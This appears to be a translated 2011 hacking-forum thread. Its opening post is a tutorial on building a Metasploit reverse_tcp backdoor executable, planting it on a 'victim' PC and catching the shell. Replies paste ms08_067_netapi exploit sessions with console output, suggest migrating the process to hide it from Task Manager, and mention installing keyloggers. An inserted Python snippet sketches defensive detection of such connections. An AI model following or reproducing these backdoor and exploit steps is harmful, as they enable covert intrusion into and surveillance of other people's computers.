msfpayload windows/shell/reverse_tcp
#1
Whew, today I couldn't decide what to post.. but after dropping by the IBT headquarters this morning I got the itch to write again.. heheheh, alright, straight to it then…

As the title says, we are going to learn how to build a reverse_tcp backdoor with Metasploit. I (zee eichel, the handsome one) tested this tutorial directly from the IBT headquarters using BackTrack 5 GNOME.

First step:

1. As we just discussed.. a backdoor.. of course, as usual, we have to build the backdoor first

[Image: snapshot9.png?w=497&h=53]

From the script above we can see that the backdoor created is named zee-reverse-shell.exe. Of course you can rename it as you like.. and for LHOST, don't forget to enter your own IP address … oh, and the output file goes to /tmp .. see the excerpt

x > /tmp/…..

this can also be changed as needed …

2. The next step is to upload that shell to the target PC… how…??? well, that depends on everyone's taste and creativity hehehehhe

3. Let's assume we have already uploaded the shell, and now we enter the commands below

/msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.101 E

LHOST = fill in with your IP address ..

PAYLOAD = must be the same as the backdoor ..

4. When the victim runs your backdoor, what happens is

[Image: snapshot8.png?w=497&h=310]

lalalalala, you get direct shell access .. heheheh .. this backdoor can also be varied with the meterpreter PAYLOAD.. but once again, this is an art… so use your logic ..
I, zee eichel, take my leave to go look for a partner ..hahahaha
FOLLOW @DutaLinux
for more questions and sharing about security and open source only

#2
nice share zee.... I'm learning more and more about Metasploit

#3
is this backdoor visible running in the Windows Task Manager, bro?

#4
(08-30-2011, 09:29 AM)koecroet wrote: is this backdoor visible running in the Windows Task Manager, bro?

it's visible, bro, but we can migrate to another PID if we use meterpreter

#5
nice info zee...
don't go looking for a partner too far away, bro, or you'll forget camp again
hehehehehehe..

#6
(08-30-2011, 03:08 PM)konspirasi wrote:
(08-30-2011, 09:29 AM)koecroet wrote: is this backdoor visible running in the Windows Task Manager, bro?

it's visible, bro, but we can migrate to another PID if we use meterpreter

wow, awesome bro
gotta try it !!

#7
what about this one, bro:

# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 732 exploits - 374 auxiliary - 82 post
+ -- --=[ 227 payloads - 27 encoders - 8 nops
=[ svn r13728 updated today (2011.09.13)

msf > use exploit/windows/sm
use exploit/windows/smb/ms03_049_netapi use exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/ms04_007_killbill use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
use exploit/windows/smb/ms04_011_lsass use exploit/windows/smb/ms10_061_spoolss
use exploit/windows/smb/ms04_031_netdde use exploit/windows/smb/netidentity_xtierrpcpipe
use exploit/windows/smb/ms05_039_pnp use exploit/windows/smb/psexec
use exploit/windows/smb/ms06_025_rasmans_reg use exploit/windows/smb/smb_relay
use exploit/windows/smb/ms06_025_rras use exploit/windows/smb/timbuktu_plughntcommand_bof
use exploit/windows/smb/ms06_040_netapi use exploit/windows/smtp/mailcarrier_smtp_ehlo
use exploit/windows/smb/ms06_066_nwapi use exploit/windows/smtp/mercury_cram_md5
use exploit/windows/smb/ms06_066_nwwks use exploit/windows/smtp/ms03_046_exchange2000_xexch50
use exploit/windows/smb/ms06_070_wkssvc use exploit/windows/smtp/wmailserver
use exploit/windows/smb/ms07_029_msdns_zonename use exploit/windows/smtp/ypops_overflow1
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.88.252
LHOST => 192.168.88.252
msf exploit(ms08_067_netapi) > set RHOST 192.168.88.252
RHOST => 192.168.88.252
msf exploit(ms08_067_netapi) > exploit

[-] Handler failed to bind to 192.168.88.252:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2+ - lang:English
[-] Could not determine the exact service pack
[*] Auto-targeting failed, use 'show targets' to manually select one
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >

#8
(09-14-2011, 03:20 PM)ririaz wrote: what about this one, bro:

# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 732 exploits - 374 auxiliary - 82 post
+ -- --=[ 227 payloads - 27 encoders - 8 nops
=[ svn r13728 updated today (2011.09.13)

msf > use exploit/windows/sm
use exploit/windows/smb/ms03_049_netapi use exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/ms04_007_killbill use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
use exploit/windows/smb/ms04_011_lsass use exploit/windows/smb/ms10_061_spoolss
use exploit/windows/smb/ms04_031_netdde use exploit/windows/smb/netidentity_xtierrpcpipe
use exploit/windows/smb/ms05_039_pnp use exploit/windows/smb/psexec
use exploit/windows/smb/ms06_025_rasmans_reg use exploit/windows/smb/smb_relay
use exploit/windows/smb/ms06_025_rras use exploit/windows/smb/timbuktu_plughntcommand_bof
use exploit/windows/smb/ms06_040_netapi use exploit/windows/smtp/mailcarrier_smtp_ehlo
use exploit/windows/smb/ms06_066_nwapi use exploit/windows/smtp/mercury_cram_md5
use exploit/windows/smb/ms06_066_nwwks use exploit/windows/smtp/ms03_046_exchange2000_xexch50
use exploit/windows/smb/ms06_070_wkssvc use exploit/windows/smtp/wmailserver
use exploit/windows/smb/ms07_029_msdns_zonename use exploit/windows/smtp/ypops_overflow1
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.88.252
LHOST => 192.168.88.252
msf exploit(ms08_067_netapi) > set RHOST 192.168.88.252
RHOST => 192.168.88.252
msf exploit(ms08_067_netapi) > exploit

[-] Handler failed to bind to 192.168.88.252:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2+ - lang:English
[-] Could not determine the exact service pack
[*] Auto-targeting failed, use 'show targets' to manually select one
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >

this doesn't seem to be running,, note "but no session was created",,, similar to what I tried yesterday,, didn't work,,
it seems to be blocked by the firewall,,
@ zhee,, I tried meterpreter bind_tcp too, also no session was created,, what's going on there??
if I'm not mistaken, once there's a session we can also plant a keylogger


this is my error, zhee

=[ metasploit v3.7.0-release [core:3.7 api:1.0]
+ -- --=[ 684 exploits - 355 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops

msf exploit(ms08_067_netapi) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set DCERPC::fake_bind_multi false
DCERPC::fake_bind_multi => false
msf exploit(ms08_067_netapi) > set RHOST 172.16.40.75
RHOST => 172.16.40.75
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.


#9
is that target PC virtualized or someone else's PC, bro?

if it's someone else's PC, and the Windows is genuine, the patches are up to date, or there's antivirus and a firewall, then it won't work

oh yeah, FYI, bind_tcp means the exploit direction is from our PC, whereas reverse means the exploit direction is from the target PC
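An endpoint-side detection sketch, added here and not part of the thread, for what posts #1, #4 and #9 describe: the dropped executable from post #1 is an ordinary process (post #4 notes it shows in Task Manager) that, for reverse_tcp, opens an outbound connection to the handler, and for bind_tcp listens for the handler to connect in. It assumes a constructed, simplified socket listing (one line per socket with the owning image path) plus an allowlist and directory list a defender would tune; only 192.168.1.101 and port 4444 come from the page (the LHOST and handler port in the transcripts).

```python
# Added example, not code from the original thread. Endpoint-side view of the
# payloads discussed in posts #1, #4 and #9: a reverse_tcp process opens an
# outbound connection to the handler, a bind_tcp process listens for it.
# Socket lines are constructed (simplified `netstat -ano` plus image path);
# only 192.168.1.101 and port 4444 come from the page (LHOST, handler port).
import re

HANDLER_PORTS = {4444}  # default exploit/multi/handler port
# Assumptions a defender would tune to their environment.
ALLOWLIST = {"chrome.exe", "outlook.exe", "svchost.exe"}
USER_WRITABLE = ("\\temp\\", "\\downloads\\", "\\appdata\\")

LINE_RE = re.compile(r"^\s*TCP\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d+)\s+(.+?)\s*$")

def analyze(lines):
    """Return (kind, pid, image, reasons) for sockets with >= 2 indicators.
    kind is "reverse" for an established outbound socket, "bind" for a listener."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        local, remote, state, pid, image = m.groups()
        name = image.rsplit("\\", 1)[-1].lower()
        if state == "ESTABLISHED":
            kind, port = "reverse", int(remote.rpartition(":")[2])
        elif state == "LISTENING":
            kind, port = "bind", int(local.rpartition(":")[2])
        else:
            continue
        reasons = []
        if port in HANDLER_PORTS:
            reasons.append(f"port {port} is a default handler port")
        if name not in ALLOWLIST:
            reasons.append(f"{name} is not an allowlisted network process")
        if any(d in image.lower() for d in USER_WRITABLE):
            reasons.append("image runs from a user-writable directory")
        if len(reasons) >= 2:  # one indicator alone is too noisy
            findings.append((kind, int(pid), name, tuple(reasons)))
    return findings

SAMPLE = [  # constructed sample, not a real capture
    "TCP 192.168.1.50:49512 192.168.1.101:4444 ESTABLISHED 2044 C:\\Users\\v\\AppData\\Local\\Temp\\zee-reverse-shell.exe",
    "TCP 0.0.0.0:4444 0.0.0.0:0 LISTENING 3108 C:\\Users\\v\\Downloads\\update.exe",
    "TCP 192.168.1.50:49513 203.0.113.10:443 ESTABLISHED 1320 C:\\Program Files\\Google\\Chrome\\chrome.exe",
    "TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 880 C:\\Windows\\System32\\svchost.exe",
]
```

Running `analyze(SAMPLE)` flags the reverse shell to 192.168.1.101:4444 and the listener on 4444, and leaves the browser and RPC listener alone; migrating into another PID (post #4) defeats the image-path checks but not the port check.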

#10
what about this one, bro:

# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 732 exploits - 374 auxiliary - 82 post
+ -- --=[ 227 payloads - 27 encoders - 8 nops
=[ svn r13728 updated today (2011.09.13)

msf > use exploit/windows/sm
use exploit/windows/smb/ms03_049_netapi use exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/ms04_007_killbill use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
use exploit/windows/smb/ms04_011_lsass use exploit/windows/smb/ms10_061_spoolss
use exploit/windows/smb/ms04_031_netdde use exploit/windows/smb/netidentity_xtierrpcpipe
use exploit/windows/smb/ms05_039_pnp use exploit/windows/smb/psexec
use exploit/windows/smb/ms06_025_rasmans_reg use exploit/windows/smb/smb_relay
use exploit/windows/smb/ms06_025_rras use exploit/windows/smb/timbuktu_plughntcommand_bof
use exploit/windows/smb/ms06_040_netapi use exploit/windows/smtp/mailcarrier_smtp_ehlo
use exploit/windows/smb/ms06_066_nwapi use exploit/windows/smtp/mercury_cram_md5
use exploit/windows/smb/ms06_066_nwwks use exploit/windows/smtp/ms03_046_exchange2000_xexch50
use exploit/windows/smb/ms06_070_wkssvc use exploit/windows/smtp/wmailserver
use exploit/windows/smb/ms07_029_msdns_zonename use exploit/windows/smtp/ypops_overflow1
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.88.252
LHOST => 192.168.88.252
msf exploit(ms08_067_netapi) > set RHOST 192.168.88.252
RHOST => 192.168.88.252
msf exploit(ms08_067_netapi) > exploit

[-] Handler failed to bind to 192.168.88.252:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2+ - lang:English
[-] Could not determine the exact service pack
[*] Auto-targeting failed, use 'show targets' to manually select one
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >

ok konspirasi bro, that was using my own laptop as the victim, but the strange thing is, bro, if I use db_autopwn -p -t -e -r
I get a session, even up to 2 sessions.
and that's with the firewall turned off but the antivirus running, it got through, bro.
but manually it just doesn't work, ugh.... I'm so confused....





